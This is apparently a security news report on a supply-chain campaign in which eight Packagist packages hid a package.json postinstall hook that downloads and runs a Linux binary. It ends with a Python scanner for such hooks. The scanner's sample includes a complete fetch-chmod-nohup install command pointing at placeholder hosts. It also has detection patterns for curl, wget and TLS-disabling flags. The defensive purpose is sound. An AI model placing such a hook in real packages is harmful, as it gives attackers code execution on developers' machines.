A new “coordinated” supply chain attack campaign has affected eight packages on Packagist that contain malicious code designed to run Linux binaries fetched from GitHub release URLs.
“Although the affected packages were all Composer packages, the malicious code was not added to composer.json,” Socket said. “Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling with PHP code.”
This “cross-ecosystem placement” makes the activity notable: developers and security teams scanning PHP dependencies may focus only on Composer-related metadata and overlook the package.json lifecycle hooks bundled within the package. The malicious versions have since been removed from Packagist.
Analysis of the packages revealed that their upstream repositories had been modified to include a postinstall script that attempts to download a Linux binary from a GitHub release URL (“github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f”), save it in the “/tmp/.sshd” folder, make it executable for all users with “chmod”, and run it in the background.
The names of the packages and their respective affected versions are listed below –
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-chief)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
Socket’s investigation found references to the same payload in 777 files on GitHub, suggesting it may be part of a broader campaign. In at least two instances, the payload was added to GitHub Actions workflow files. It is not currently known how many of these correspond to distinct commits, forks, duplicate package artifacts, or cached references.
“This suggests that the attacker was not relying on a single execution mechanism. In package artifacts, the payload was triggered through a package.json postinstall script,” the application security firm said. “In the workflow files, it was deployed to run during GitHub Actions jobs.”
Furthermore, the exact nature of the second-stage payload downloaded from GitHub is unclear, as the GitHub account that hosted the repository is no longer available. The choice of the name “gvfsd-network” for the malware is also notable: it mimics the GNOME Virtual File System (GVfs) daemon responsible for managing and browsing network shares.
“Even without the second-stage binary, this is enough to guarantee blocking the malicious installer,” Socket said. “It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running downloaded binaries in the background.”
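The installer behaviour described above (a package.json postinstall hook that downloads a GitHub release asset, stages it under a hidden /tmp directory, chmods it, suppresses errors, disables TLS verification and backgrounds it) can be triaged heuristically before a dependency is installed. The following scanner is an added example, not Socket's tooling or code from any of the affected packages; it reads a package.json, pulls out the npm lifecycle hooks that run without user interaction, and flags a hook when several of the article's indicators appear in the same command. The sample package.json contents, account and repository names are constructed placeholders.

```python
import json
import re

# npm lifecycle hooks that run automatically during `npm install` with no
# action by the developer; these are the ones worth auditing in a Composer
# package that also ships JavaScript build tooling.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Indicator patterns modelled on the behaviour the article describes. Each one
# alone is common in legitimate scripts; the combination is what matters.
INDICATORS = {
    "github_release_download": re.compile(r"github\.com/[^\s'\"]+/releases/download/"),
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "hidden_tmp_path": re.compile(r"/tmp/\.[A-Za-z0-9_]+"),
    "chmod_exec": re.compile(r"\bchmod\s+(a\+x|\+x|[0-7]{3,4})\b"),
    "background_exec": re.compile(r"(&\s*$|\bnohup\b|\bsetsid\b)"),
    "tls_disabled": re.compile(r"(curl[^;|&]*\s-[A-Za-z]*k\b|--insecure|--no-check-certificate)"),
    "errors_suppressed": re.compile(r"(2>\s*/dev/null|\|\|\s*true)"),
}


def extract_hooks(package_json_text):
    """Return {hook_name: command} for the auto-run lifecycle hooks in a package.json."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts", {})
    if not isinstance(scripts, dict):
        return {}
    return {name: cmd for name, cmd in scripts.items()
            if name in LIFECYCLE_HOOKS and isinstance(cmd, str)}


def scan_hook(command):
    """Return the sorted list of indicator names that match one hook command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command))


def scan_package_json(package_json_text, min_hits=2):
    """Flag lifecycle hooks whose command matches at least `min_hits` indicators.

    Returns a list of findings; an empty list means nothing crossed the threshold.
    """
    findings = []
    for hook, cmd in extract_hooks(package_json_text).items():
        hits = scan_hook(cmd)
        if len(hits) >= min_hits:
            findings.append({"hook": hook, "indicators": hits, "command": cmd})
    return findings


# Constructed sample inputs (not taken from any real package).
SAMPLE_BENIGN = json.dumps({
    "name": "example-theme",
    "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
})

SAMPLE_MALICIOUS = json.dumps({
    "name": "example-theme",
    "scripts": {
        "build": "vite build",
        # Placeholder account/repo; the shape mirrors the installer the article describes.
        "postinstall": (
            "curl -fsSLk https://github.com/EXAMPLE-ACCOUNT/EXAMPLE-REPO/releases/download/v1/helper "
            "-o /tmp/.sshd/helper 2>/dev/null && chmod 777 /tmp/.sshd/helper && "
            "nohup /tmp/.sshd/helper >/dev/null 2>&1 &"
        ),
    },
})

if __name__ == "__main__":
    for label, text in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS)):
        print(label, json.dumps(scan_package_json(text), indent=2))
```

Run it over every package.json found in vendor/ after `composer install --no-scripts` (or over the extracted dist archive before installation) rather than after npm has already executed the hooks. The threshold of two indicators keeps ordinary `postinstall: "node build.js"` hooks quiet while still catching the download-chmod-background pattern; tune it to your codebase and treat a hit as a prompt for manual review, not proof of compromise.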